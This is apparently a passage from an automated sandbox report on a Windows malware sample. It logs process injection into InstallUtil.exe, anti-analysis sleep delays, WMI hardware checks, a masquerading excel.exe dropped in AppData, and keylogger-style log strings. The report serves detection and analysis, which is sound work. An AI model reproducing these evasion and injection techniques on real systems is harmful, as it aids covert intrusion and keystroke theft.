                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\TM57812337.exe TID: 6544Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\TM57812337.exe TID: 6552Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7004Thread sleep count: 60 > 30
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe TID: 5912Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe TID: 3164Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4432Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4504Thread sleep count: 6232 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4504Thread sleep count: 2749 > 30
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe TID: 5860Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe TID: 5072Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe TID: 3420Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6996Thread sleep count: 63 > 30
                Source: C:\Users\user\AppData\Roaming\excel\excel.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\timeout.exe TID: 5180Thread sleep count: 64 > 30
                Source: C:\Users\user\AppData\Roaming\excel\excel.exe TID: 6220Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6224Thread sleep count: 80 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3544Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6056Thread sleep count: 31 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6056Thread sleep count: 287 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\TM57812337.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6232
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\TM57812337.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\TM57812337.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: TM57812337.exe, 00000000.00000002.359594692.0000000000730000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.450778091.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.490445917.0000000001499000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.429581802.00000000014AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\TM57812337.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_068582C8 LdrInitializeThunk,
                Source: C:\Users\user\Desktop\TM57812337.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: EB8008
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 420000
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D6B008
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B2C008
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 911008
                Source: C:\Users\user\Desktop\TM57812337.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\TM57812337.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe "C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe"
                Source: C:\Users\user\Desktop\TM57812337.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
                Source: InstallUtil.exe, 0000000E.00000002.492535120.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.492717747.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.492496792.00000000032A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: InstallUtil.exe, 0000000E.00000002.492535120.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font><-
                Source: InstallUtil.exe, 0000000E.00000002.492717747.00000000032B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font>r<br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(05/27/2022 14:22:16)</font></font><br><font color="#00ba66">{Win}</font><-
                Source: InstallUtil.exe, 0000000E.00000002.492717747.00000000032B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font>r<br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(05/27/2022 14:22:16)</font></font><br><font color="#00ba66">{Win}</font><br>
                Source: InstallUtil.exe, 0000000E.00000002.492535120.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font>r
                Source: InstallUtil.exe, 0000000E.00000002.492717747.00000000032B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font>r<br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(05/27/2022 14:22:16)</font></font><br>@
                Source: InstallUtil.exe, 0000000E.00000002.492535120.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br><font color="#00ba66">{Win}</font>r<br>
                Source: InstallUtil.exe, 0000000E.00000002.492535120.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(05/27/2022 14:05:32)</font></font><br>
                Source: C:\Users\user\Desktop\TM57812337.exeQueries volume information: C:\Users\user\Desktop\TM57812337.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeQueries volume information: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeQueries volume information: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeQueries volume information: C:\Users\user\AppData\Roaming\excel\excel.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeQueries volume information: C:\Users\user\AppData\Roaming\excel\excel.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
